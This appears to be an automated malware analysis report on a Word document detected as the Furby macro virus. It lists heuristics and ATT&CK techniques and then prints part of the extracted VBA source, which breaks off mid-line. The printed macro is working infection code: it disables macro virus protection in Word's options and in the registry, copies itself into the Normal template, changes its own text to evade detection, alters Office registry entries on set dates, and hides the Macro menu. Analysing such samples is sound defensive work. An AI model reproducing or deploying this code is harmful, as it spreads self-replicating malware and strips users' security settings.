Verdict: MALICIOUS
Risk Score: 240
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including AutoOpen and AutoClose, which are indicative of malicious intent. The ClamAV detection 'Doc.Trojan.Furby-1' strongly suggests a known malware family. The VBA script attempts to modify registry keys related to Microsoft Office applications, potentially for persistence or to alter application behavior, and includes obfuscated logic that is difficult to fully decipher but appears to be part of the Furby malware's known functionality.
Heuristics (5)
- ClamAV: Doc.Trojan.Furby-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Furby-1
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16918 bytes |

SHA-256: d71c2050668ca1b0fdd40b7f0e06458cc3feadcb4170d3373d3d04c0e39fca67
Detection: ClamAV: Doc.Trojan.Furby-1
Obfuscation or payload: unlikely

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error GoTo furby
Randomize: Options.VirusProtection = Chr(48): Options.SaveNormalPrompt = Chr(48): Options.ConfirmConversions = Chr(48): zz = 5: vx = 1: xv = 4: x = 0: z = 0: y = 0
rtx = ActiveDocument.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).codemodule.countoflines
stx = NormalTemplate.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).codemodule.countoflines
If stx > Sgn(x) And rtx > Sgn(x) Then GoTo furby
If stx = Sgn(x) Then
Set xyz = NormalTemplate.VBProject.VBComponents
Set xhst = ActiveDocument.VBProject.VBComponents
If Month(Now()) = 1 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.Document.8", "") = "It's Furby!"
If Month(Now()) = 2 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.Addin.8", "") = "Microsoft Furby Addin"
If Month(Now()) = 3 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.Document.8", "") = "Word Furby Document"
If Month(Now()) = 4 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.Application.8", "") = "Microsoft Furby Application"
If Month(Now()) = 5 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.Template.8", "") = "Microsoft Furby Template"
If Month(Now()) = 6 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\PowerPoint.Template.8", "") = "PowerPoint Furby Template"
If Month(Now()) = 7 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.RTF.8", "") = "Rich Furby Format"
If Month(Now()) = 8 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.Wizard.8", "") = "Microsoft Furby Wizard"
If Month(Now()) = 9 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.Picture.8", "") = "Microsoft Furby Picture"
If Month(Now()) = 10 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\PowerPoint.Show.8", "") = "Microsoft Furby Presentation"
If Month(Now()) = 11 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\ExcelWorksheet", "") = "Microsoft Furby Worksheet"
If Month(Now()) = 12 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\PowerPoint.Slide.8", "") = "Microsoft Furby Slide"
xhst.Item(Cos(Atn(CInt(1)))).Name = xyz.Item(Cos(Atn(CInt(1)))).Name
xhst.Item(Cos(Atn(CInt(1)))).Export Windows.Application.Path & Abs(vx) & Chr(46) + Chr(100) + Chr(108) + Chr(108)
End If
If rtx = Sgn(x) Then Set xyz = ActiveDocument.VBProject.VBComponents
xyz.Item(Cos(Atn(CInt(1)))).codemodule.AddFromFile Windows.Application.Path & Abs(vx) & Chr(46) + Chr(100) + Chr(108) + Chr(108)
With xyz.Item(Cos(Atn(CInt(1)))).codemodule
For j = Abs(vx) To Abs(xv)
.deletelines Abs(vx)
Next j
End With
With xyz.Item(Cos(Atn(CInt(1)))).codemodule
For j = Abs(zz) To xyz.Item(Cos(Atn(CInt(1)))).codemodule.countoflines Step Abs(zz)
y = Int(Rnd(412835) * 303989) + 8485
z = Int(Rnd(487958) * 785865) + 2988
.replaceline j, Chr(39) & y * z & Application.Assistant & z * y & y * z & Application.DisplayRecentFiles & Application.StartupPath
Next j
End With
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = "0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = "0"
If stx = Sgn(x) Then CommandBars(Chr(116) + Chr(111) + Chr(111) + Chr(108) + Chr(115)).Controls(Chr(77) + Chr(97) + Chr(99) + Chr(114) + Chr(111)).Delete
If stx = Sgn(x) Then CommandBars(Chr(116) + Chr(111) + Chr(111) + Chr(108) + Chr(115)).Controls(Chr(79) + Chr(112) + Chr(116) + Chr
... (truncated)